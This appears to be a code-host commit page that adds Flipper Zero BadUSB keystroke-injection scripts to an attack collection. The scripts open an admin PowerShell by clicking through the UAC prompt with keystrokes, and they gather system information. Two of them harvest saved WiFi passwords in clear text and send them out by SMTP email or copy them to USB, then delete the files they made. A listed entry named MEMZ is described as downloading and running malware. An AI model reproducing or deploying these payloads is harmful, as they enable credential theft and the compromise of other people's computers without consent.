🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/Execution/MemzMalware.txt
    1 1  REM Title: MEMZ.exe Malware
    2 2  REM Author: UNC0V3R3D
    3  -REM Description: I am not responsible for any DAMAGE!! Opens PowerShell, downloads File and runs File to create chaos.
     3 +REM Description: I am not responsible for any DAMAGE!! Opens PowerShell, downloads File and runs File to create chaos. I
    4 4  REM Version: 1.0
    5 5  REM Category: Execution
    6 6  DEFAULT_DELAY 700
    skipped 33 lines
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/FUN/NoMoreSound.txt
     1 +REM Author: UNC0V3R3D
     2 +REM Description:
     3 +REM Author: UNC0V3R3D
     4 +REM Description: Mutes windows audio...
     5 +REM Version: 1.0
     6 +REM Category:
     7 +DELAY 500
     8 +GUI r
     9 +DELAY 300
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +DELAY 200
     12 +ENTER
     13 +DELAY 600
     14 +LEFTARROW
     15 +DELAY 300
     16 +ENTER
     17 +DELAY 450
     18 +STRING (new-object -com wscript.shell).SendKeys([char]173)
     19 +DELAY 200
     20 +ENTER
     21 + 
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/Information-Gathering/GetAllComputerInfo.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Simple Powershell script that stores alot of Info about the PC into a file. For more info read the comments (REM) in the code below.
     3 +REM Version: 1.0
     4 +REM Category: Info
     5 +DELAY 1000
     6 +GUI r
     7 +DELAY 450
     8 +REM Start Powershell as Admin
     9 +STRING powershell Start-Process powershell -Verb runAs
     10 +DELAY 500
     11 +ENTER
     12 +DELAY 600
     13 +LEFTARROW
     14 +DELAY 600
     15 +ENTER
     16 +DELAY 750
     17 +REM Change the "Path" to your path ("C:\...").
     18 +STRING $Path = "PATH"
     19 +DELAY 500
     20 +ENTER
     21 +DELAY 500
     22 +REM Creates the Results.txt file to the path
     23 +STRING New-Item -Path "$Path\Results.txt" -ItemType File
     24 +DELAY 500
     25 +ENTER
     26 +DELAY 700
     27 +REM Gets all the Info about the PC and stores them into the created Results.txt file
     28 +STRING Get-ComputerInfo | Out-File -FilePath "$Path\Results.txt"
     29 +DELAY 300
     30 +ENTER
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/PasswordStealing/StealWifiKeys_Email.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Steals all of the saved Wifi Passwords and sends them via an outlook email.
     3 +REM Version: 1.0
     4 +REM Category: PasswordStuff
     5 +DEFAULT_DELAY 600
     6 +DELAY 500
     7 +WINDOWS r
     8 +DELAY 500
     9 +STRING cmd
     10 +ENTER
     11 +DELAY 200
     12 +STRING cd %USERPROFILE% & netsh wlan show profiles | findstr "All" > a.txt
     13 +ENTER
     14 +STRING echo SETLOCAL EnableDelayedExpansion^
     15 +ENTER
     16 +ENTER
     17 +STRING for /f "tokens=5*" %%i in (a.txt) do (^
     18 +ENTER
     19 +ENTER
     20 +STRING set val=%%i %%j^
     21 +ENTER
     22 +ENTER
     23 +STRING if "!val:~-1!" == " " set val=!val:~0,-1!^
     24 +ENTER
     25 +ENTER
     26 +STRING echo !val!^>^>b.txt) > filter.bat
     27 +ENTER
     28 +STRING filter.bat
     29 +DELAY 300
     30 +ENTER
     31 +STRING (for /f "tokens=*" %i in (b.txt) do @echo SSID: %i & netsh wlan show profiles name="%i" key=clear | findstr /c:"Key Content" & echo.) > Log.txt
     32 +ENTER
     33 +DELAY 1000
     34 +STRING exit
     35 +DELAY 500
     36 +ENTER
     37 +DELAY 1000
     38 +WINDOWS r
     39 +DELAY 500
     40 +STRING powershell
     41 +ENTER
     42 +DELAY 1000
     43 +STRING del .\a.txt
     44 +ENTER
     45 +STRING del .\b.txt
     46 +ENTER
     47 +STRING del .\filter.bat
     48 +ENTER
     49 +STRING $SMTPServer = 'smtp-mail.outlook.com'
     50 +ENTER
     51 +STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
     52 +ENTER
     53 +STRING $SMTPInfo.EnableSSL = $true
     54 +ENTER
     55 +STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('EMAIL HERE', 'EMAIL PASSWORD HERE')
     56 +ENTER
     57 +STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
     58 +ENTER
     59 +STRING $ReportEmail.From = 'YOUR EMAIL'
     60 +ENTER
     61 +STRING $ReportEmail.To.Add('YOUR EAMIL')
     62 +ENTER
     63 +STRING $ReportEmail.Subject = 'WiFi key grabber'
     64 +ENTER
     65 +STRING $ReportEmail.Body = (Get-Content Log.txt | out-string)
     66 +ENTER
     67 +STRING $SMTPInfo.Send($ReportEmail)
     68 +ENTER
     69 +DELAY 3000
     70 +STRING del Log.txt
     71 +DELAY 500
     72 +STRING exit
     73 +ENTER
     74 + 
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/PasswordStealing/StealWifiKeys_onUSB.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Steals all of the saved Wifi Passwords and stores them into a USB device of your choice.
     3 +REM Version: 1.0
     4 +REM Category: PasswordStuff
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 1000
     8 +WINDOWS r
     9 +DELAY 900
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 900
     16 +ALT y
     17 +DELAY 900
     18 +GUI UP
     19 +DELAY 900
     20 +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;netsh wlan export profile key=clear folder=$fileSaveDir;Compress-Archive -Path $fileSaveDir -DestinationPath File path on USB device here
  • FlipperZero_BadUSB_Collection/PasswordStealing/WifiPassWords_Badusb.rar
    Binary file.
Please wait...
Page is in error, reload to recover